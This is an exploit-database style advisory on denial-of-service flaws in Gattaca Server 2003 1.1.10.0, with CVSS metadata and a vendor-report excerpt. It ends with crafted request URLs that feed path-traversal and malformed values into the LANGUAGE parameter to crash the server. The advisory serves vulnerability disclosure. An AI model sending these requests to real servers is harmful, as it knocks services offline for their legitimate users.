Multiple Denial of Service Vulnerabilities in Gattaca Server 2003

vendor:

Gattaca Server 2003

by:

Unknown

5.5

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: Gattaca Server 2003

Affected Version From: 1.1.10.0

Affected Version To: 1.1.10.0

Patch Exists: NO

Related CWE: Not available

CPE: Not available

Metasploit:

Other Scripts:

Platforms Tested: Not specified

Unknown

Multiple Denial of Service Vulnerabilities in Gattaca Server 2003

The Gattaca Server 2003 is vulnerable to multiple denial of service vulnerabilities. These vulnerabilities allow a remote attacker to crash the application, resulting in a denial of service for legitimate users. The vulnerabilities can be exploited by sending specially crafted requests to the server.

Mitigation:

No known mitigation or remediation available at the moment.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10728/info

It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities.

These vulnerabilities allow a remote attacker to crash the application, denying service to legitimate users.

Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well. 

http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en